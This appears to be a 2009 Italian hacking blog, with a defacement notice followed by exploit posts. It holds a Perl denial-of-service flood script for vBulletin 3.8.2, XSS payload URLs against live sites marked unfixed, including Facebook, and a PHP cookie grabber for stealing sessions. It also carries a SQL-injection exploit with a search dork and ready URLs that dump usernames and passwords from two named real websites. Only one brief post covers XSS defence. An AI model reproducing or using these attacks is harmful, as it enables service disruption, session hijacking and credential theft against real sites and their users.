pWnt By Securityspl0its-Forums

pWnt By l3d & BlAcK HaT – Securityspl0its-Forums Community

nj3ctor — Thu, 30 Jul 2009 00:27:30 +0000

Heila nj3ctor il tuo lamero blog è stato appena defacciato

Motivi: rips e altro

pWnt By l3d & BlAcK HaT – Securityspl0its-Forums

http://anonymousite.altervista.org/board/index.php

* vBulletin® Version 3.8.2 Denial of Service Exploit

nj3ctor — Fri, 10 Jul 2009 18:44:25 +0000

######################################
if (@ARGVvBulletin® Version 3.8.2);
chomp($ziel =);
if ($ziel eq”"){
die “$fehler\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Path->);
chomp($path =);
if ($path eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print “Verwundbarkeit\n”;
print”forumdisplay.php?f=\n”;
print”->”n;
chomp($vul =);
if ($vul eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Time->);
chomp($flood =);
if ($flood eq “”) {
die “$fehler !\a\n”;}
print”$block\n”;
print”$block\n”;
print q(Port->);
chomp($port =);
if ($port eq “”){
die “$fehler \n”;}
print”$block\n”;
print q(Send “start”->);
chomp($start =);
if ($start eq “”) {
die “$fehler\n”;}
print “$block\a\n”;
print “[+]Konntroliere Daten \n”;
print “[*]Kontroliere Ziel : $ziel\n”;
print “[*]Kontroliere Board : $path\n”;
print “[*]Kontroliere Port : $port\n”;
print “$block\n”;
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = “$ziel”.”$path”.”$vul”;
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => “$ziel”,
PeerPort => “$port”,
Proto => “tcp”,
);

print $sock “POST $path$vul HTTP/1.1\n”;
print $sock “Host: $ziel\n”;
print $sock “Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n”;
print $sock “Referer: $ziel\n”;
print $sock “Accept-Language: en-us\n”;
print $sock “Content-Type: application/x-www-form-urlencoded\n”;
print $sock “User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n”;
print $sock “Content-Length: $lrg\n\n”;
print $sock “$postit\n”;
close($sock);
syswrite STDOUT, “->BLACKOUT<-";
$x++;
}
}else{
die "Fehler kann nicht zum Ziel verbinden $ziel !\n";
}

apps.facebook.com XSS Vulnerability

nj3ctor — Tue, 07 Jul 2009 00:30:05 +0000

Sito XSSed:
facebook.com

XSS:
http://apps.facebook.com/flixville/search/?locale=US&searchText=%22%3E%3Cfont%20size=70%20color=red%
3EXSSed%20by%20Uber0n

Autore:
Uber0n

Status:
UNFIXED

PHPRecipeBook

nj3ctor — Mon, 06 Jul 2009 23:33:21 +0000

Download PHPRecipeBook: http://phprecipebook.sourceforge.net/

spl0itz: http://www.milw0rm.com/exploits/8330

//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK – GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
*****************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/

[-] Bugs : Remote SQL injection Exploit
[-] Dork : inurl:”/index.php?m=” “PHPRecipeBook 2.39″
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL
[+] GroupWeb : www.1923turk.biz
[-] Contact : darkdewil@1923turk.biz

[!] Note : Always use the time you have to finish your work.
Never leave it to the last minute.
Once time goes away, it never comes back

*****************************************************
//////////////////////////////////////////////////////////////////////
*****************************************************
[-- Bugs --]

(+)

/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]

[-- SQL EXPLOIT --]

Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users–
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users–

# milw0rm.com [2009-03-31]

Ecco due siti vulnerabili:
http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://www.lowcarbrecipes.org/index.php?m=recipes&a=search&search=yes&base_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (password utenti)
—
http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_login,3,4,5,6,7+from+security_users– (nomi utenti)

http://ww.cseworks.com/index.php?m=recipes&a=search&search=yes&course_id=-7+union+select+1,user_password,3,4,5,6,7+from+security_users– (password utenti)

Difendersi dalle XSS (solo info)

nj3ctor — Sun, 05 Jul 2009 18:02:37 +0000

In questo articolo mi limiterò a far capire ai webmaster e agli utenti di un sito come difendersi dalle XSS.

Per quanto riguarda gli sviluppatori dovranno controllare ogni informazione inserita in input dagli utenti prima di inoltrarla alle proprie applicazioni.

Per quanto riguarda gli utenti non dovranno fare altro che tenere aggiornati i loro browser poiché oramai ognuno di essi ha il blocco di script in JavaScript, VBScript e ActiVix.

(Info su come proteggersi dalle XSS)

Cookie grabber

nj3ctor — Sun, 05 Jul 2009 17:51:45 +0000

Esempio di cookie grabber da utilizzare se la XSS da voi trovata su un sito sia grabbante e che quindi possiate rubare dei cookie:

$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Referer: ‘.$referer.’

‘);
fclose($fp);

CHECK B.O. The Computer Guardian XSSed!

nj3ctor — Sun, 05 Jul 2009 17:30:34 +0000

Sito XSSed:
trojan.it

XSS:
http://www.trojan.it/index2.asp?lng=%22%3E%3Cscript%3Ealert%28%22nj3ctor%22%29;%3C/script%3E

Autore:
nj3ctor

Status:
UNFIXED

Reset Password Facebook con XSS

nj3ctor — Sun, 05 Jul 2009 17:03:19 +0000

XSS per resettare password Facebook:
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mirror di XSSed.com:
http://www.xssed.com/mirror/55951/

Autore:
DaiMon

Status:
UNFIXED

Hello world!

nj3ctor — Sat, 04 Jul 2009 15:57:45 +0000

Welcome to WordPress.com. This is your first post. Edit or delete it and start blogging!